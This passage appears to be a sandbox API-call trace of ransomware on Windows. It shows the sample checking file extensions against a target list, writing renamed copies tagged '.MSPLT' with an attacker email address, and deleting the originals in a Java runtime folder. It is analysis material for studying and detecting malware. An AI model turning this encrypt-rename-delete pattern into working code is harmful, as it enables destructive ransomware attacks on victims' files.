(lpString=".doc") returned 4 [0303.392] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.392] lstrlenW (lpString=".docx") returned 5 [0303.392] lstrcmpiW (lpString1=".docx", lpString2="n.jar") returned -1 [0303.392] lstrlenW (lpString=".pdf") returned 4 [0303.392] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.392] lstrlenW (lpString=".xls") returned 4 [0303.392] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.392] lstrlenW (lpString=".xlsx") returned 5 [0303.392] lstrcmpiW (lpString1=".xlsx", lpString2="n.jar") returned -1 [0303.392] lstrlenW (lpString=".ppt") returned 4 [0303.393] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.393] lstrlenW (lpString=".zip") returned 4 [0303.393] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.393] lstrlenW (lpString=".rar") returned 4 [0303.393] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.393] lstrlenW (lpString=".bz2") returned 4 [0303.393] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.393] lstrlenW (lpString=".7z") returned 3 [0303.393] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.393] lstrlenW (lpString=".dbf") returned 4 [0303.393] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.393] lstrlenW (lpString=".1cd") returned 4 [0303.393] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.393] lstrlenW (lpString=".jpg") returned 4 [0303.393] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.393] lstrlenW (lpString=".doc") returned 4 [0303.393] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.393] lstrlenW (lpString=".docx") returned 5 [0303.393] lstrcmpiW (lpString1=".docx", lpString2="n.jar") returned -1 [0303.393] lstrlenW (lpString=".pdf") returned 4 [0303.393] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.394] lstrlenW (lpString=".xls") returned 4 [0303.394] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.394] lstrlenW (lpString=".xlsx") returned 5 [0303.394] lstrcmpiW (lpString1=".xlsx", lpString2="n.jar") returned -1 [0303.394] lstrlenW (lpString=".ppt") returned 4 [0303.394] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.394] lstrlenW (lpString=".zip") returned 4 [0303.394] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.394] lstrlenW (lpString=".rar") returned 4 [0303.394] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.394] lstrlenW (lpString=".bz2") returned 4 [0303.394] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.394] lstrlenW (lpString=".7z") returned 3 [0303.394] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.394] lstrlenW (lpString=".dbf") returned 4 [0303.394] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.394] lstrlenW (lpString=".1cd") returned 4 [0303.394] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 54 [0303.394] lstrlenW (lpString=".jpg") returned 4 [0303.394] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.394] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.395] lstrlenW (lpString="sunec.jar") returned 9 [0303.395] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0303.396] GetFileSizeEx (in: hFile=0x4f8, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=42185) returned 1 [0303.396] CloseHandle (hObject=0x4f8) returned 1 [0303.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar")) returned 0x20 [0303.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.397] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0303.397] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.397] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.397] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4fc [0303.399] GetLastError () returned 0x0 [0303.399] ReadFile (in: hFile=0x4f8, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xa4c9, lpOverlapped=0x0) returned 1 [0303.403] WriteFile (in: hFile=0x4fc, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xa4d0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xa4d0, lpOverlapped=0x0) returned 1 [0303.406] ReadFile (in: hFile=0x4f8, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0303.406] WriteFile (in: hFile=0x4fc, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xe6, lpOverlapped=0x0) returned 1 [0303.406] SetEndOfFile (hFile=0x4fc) returned 1 [0303.406] CloseHandle (hObject=0x4fc) returned 1 [0303.416] SetFilePointerEx (in: hFile=0x4f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.417] SetEndOfFile (hFile=0x4f8) returned 1 [0303.428] CloseHandle (hObject=0x4f8) returned 1 [0303.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0303.429] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar")) returned 1 [0303.430] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.431] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.431] lstrlenW (lpString=".doc") returned 4 [0303.431] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.431] lstrlenW (lpString=".docx") returned 5 [0303.431] lstrcmpiW (lpString1=".docx", lpString2="c.jar") returned -1 [0303.431] lstrlenW (lpString=".pdf") returned 4 [0303.431] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.431] lstrlenW (lpString=".xls") returned 4 [0303.431] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.431] lstrlenW (lpString=".xlsx") returned 5 [0303.431] lstrcmpiW (lpString1=".xlsx", lpString2="c.jar") returned -1 [0303.431] lstrlenW (lpString=".ppt") returned 4 [0303.431] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.431] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.431] lstrlenW (lpString=".zip") returned 4 [0303.431] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.431] lstrlenW (lpString=".rar") returned 4 [0303.432] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.432] lstrlenW (lpString=".bz2") returned 4 [0303.432] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.432] lstrlenW (lpString=".7z") returned 3 [0303.432] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.432] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.432] lstrlenW (lpString=".dbf") returned 4 [0303.432] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.432] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.432] lstrlenW (lpString=".1cd") returned 4 [0303.432] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.432] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.432] lstrlenW (lpString=".jpg") returned 4 [0303.432] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.432] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.433] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.433] lstrlenW (lpString=".doc") returned 4 [0303.433] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.433] lstrlenW (lpString=".docx") returned 5 [0303.433] lstrcmpiW (lpString1=".docx", lpString2="c.jar") returned -1 [0303.433] lstrlenW (lpString=".pdf") returned 4 [0303.433] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.433] lstrlenW (lpString=".xls") returned 4 [0303.433] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.433] lstrlenW (lpString=".xlsx") returned 5 [0303.433] lstrcmpiW (lpString1=".xlsx", lpString2="c.jar") returned -1 [0303.433] lstrlenW (lpString=".ppt") returned 4 [0303.433] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.433] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.433] lstrlenW (lpString=".zip") returned 4 [0303.433] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.433] lstrlenW (lpString=".rar") returned 4 [0303.433] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.433] lstrlenW (lpString=".bz2") returned 4 [0303.433] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.433] lstrlenW (lpString=".7z") returned 3 [0303.434] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.434] lstrlenW (lpString=".dbf") returned 4 [0303.434] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.434] lstrlenW (lpString=".1cd") returned 4 [0303.434] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.434] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar") returned 52 [0303.434] lstrlenW (lpString=".jpg") returned 4 [0303.434] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.434] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.434] lstrlenW (lpString="sunjce_provider.jar") returned 19 [0303.777] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0303.910] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=280161) returned 1 [0303.910] CloseHandle (hObject=0x4e8) returned 1 [0303.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar")) returned 0x20 [0303.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.911] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0303.911] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.911] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.911] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0303.912] GetLastError () returned 0x0 [0303.912] ReadFile (in: hFile=0x4e8, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x44661, lpOverlapped=0x0) returned 1 [0304.233] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x44670, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x44670, lpOverlapped=0x0) returned 1 [0304.241] ReadFile (in: hFile=0x4e8, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0304.241] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xfa, lpOverlapped=0x0) returned 1 [0304.241] SetEndOfFile (hFile=0x4c0) returned 1 [0304.241] CloseHandle (hObject=0x4c0) returned 1 [0304.255] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0304.255] SetEndOfFile (hFile=0x4e8) returned 1 [0304.539] CloseHandle (hObject=0x4e8) returned 1 [0304.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0304.874] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar")) returned 1 [0305.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.131] lstrlenW (lpString=".doc") returned 4 [0305.131] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0305.131] lstrlenW (lpString=".docx") returned 5 [0305.131] lstrcmpiW (lpString1=".docx", lpString2="r.jar") returned -1 [0305.131] lstrlenW (lpString=".pdf") returned 4 [0305.131] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0305.131] lstrlenW (lpString=".xls") returned 4 [0305.131] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0305.131] lstrlenW (lpString=".xlsx") returned 5 [0305.131] lstrcmpiW (lpString1=".xlsx", lpString2="r.jar") returned -1 [0305.131] lstrlenW (lpString=".ppt") returned 4 [0305.131] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0305.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.131] lstrlenW (lpString=".zip") returned 4 [0305.131] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0305.131] lstrlenW (lpString=".rar") returned 4 [0305.132] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0305.132] lstrlenW (lpString=".bz2") returned 4 [0305.132] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0305.132] lstrlenW (lpString=".7z") returned 3 [0305.132] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0305.132] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.132] lstrlenW (lpString=".dbf") returned 4 [0305.132] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0305.132] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.132] lstrlenW (lpString=".1cd") returned 4 [0305.132] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0305.132] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.132] lstrlenW (lpString=".jpg") returned 4 [0305.132] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0305.132] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.132] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.132] lstrlenW (lpString=".doc") returned 4 [0305.132] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0305.132] lstrlenW (lpString=".docx") returned 5 [0305.132] lstrcmpiW (lpString1=".docx", lpString2="r.jar") returned -1 [0305.132] lstrlenW (lpString=".pdf") returned 4 [0305.132] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0305.132] lstrlenW (lpString=".xls") returned 4 [0305.133] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0305.133] lstrlenW (lpString=".xlsx") returned 5 [0305.133] lstrcmpiW (lpString1=".xlsx", lpString2="r.jar") returned -1 [0305.133] lstrlenW (lpString=".ppt") returned 4 [0305.133] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0305.133] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.133] lstrlenW (lpString=".zip") returned 4 [0305.133] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0305.133] lstrlenW (lpString=".rar") returned 4 [0305.133] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0305.133] lstrlenW (lpString=".bz2") returned 4 [0305.133] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0305.133] lstrlenW (lpString=".7z") returned 3 [0305.133] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0305.133] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.133] lstrlenW (lpString=".dbf") returned 4 [0305.133] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0305.133] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.133] lstrlenW (lpString=".1cd") returned 4 [0305.133] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0305.133] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar") returned 62 [0305.133] lstrlenW (lpString=".jpg") returned 4 [0305.133] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0305.134] lstrcmpiW (lpString1=".src", lpString2=".MSPLT") returned 1 [0305.134] lstrlenW (lpString="fontconfig.properties.src") returned 25 [0305.134] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0305.484] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=10568) returned 1 [0305.484] CloseHandle (hObject=0x3e4) returned 1 [0305.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src")) returned 0x20 [0305.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0306.096] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0306.401] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.401] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.401] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0306.689] GetLastError () returned 0x0 [0306.689] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x2948, lpOverlapped=0x0) returned 1 [0306.693] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x2950, lpOverlapped=0x0) returned 1 [0306.695] ReadFile (in: hFile=0x520, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0306.695] WriteFile (in: hFile=0x51c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x106, lpOverlapped=0x0) returned 1 [0306.695] SetEndOfFile (hFile=0x51c) returned 1 [0306.695] CloseHandle (hObject=0x51c) returned 1 [0306.698] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.698] SetEndOfFile (hFile=0x520) returned 1 [0306.703] CloseHandle (hObject=0x520) returned 1 [0306.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0306.705] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src")) returned 1 [0306.705] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.705] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.705] lstrlenW (lpString=".doc") returned 4 [0306.706] lstrcmpiW (lpString1=".doc", lpString2=".src") returned -1 [0306.706] lstrlenW (lpString=".docx") returned 5 [0306.706] lstrcmpiW (lpString1=".docx", lpString2="s.src") returned -1 [0306.706] lstrlenW (lpString=".pdf") returned 4 [0306.706] lstrcmpiW (lpString1=".pdf", lpString2=".src") returned -1 [0306.706] lstrlenW (lpString=".xls") returned 4 [0306.706] lstrcmpiW (lpString1=".xls", lpString2=".src") returned 1 [0306.706] lstrlenW (lpString=".xlsx") returned 5 [0306.706] lstrcmpiW (lpString1=".xlsx", lpString2="s.src") returned -1 [0306.706] lstrlenW (lpString=".ppt") returned 4 [0306.706] lstrcmpiW (lpString1=".ppt", lpString2=".src") returned -1 [0306.706] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 64 [0306.706] lstrlenW (lpString=".zip") returned 4 [0306.706] lstrcmpiW (lpString1=".zip", lpString2=".src") returned 1 [0306.706] lstrlenW (lpString=".rar") returned 4 [0306.706] lstrcmpiW (lpString1=".rar", lpString2=".src") returned -1 [0306.706] lstrlenW (lpString=".bz2") returned 4 [0306.706] lstrcmpiW 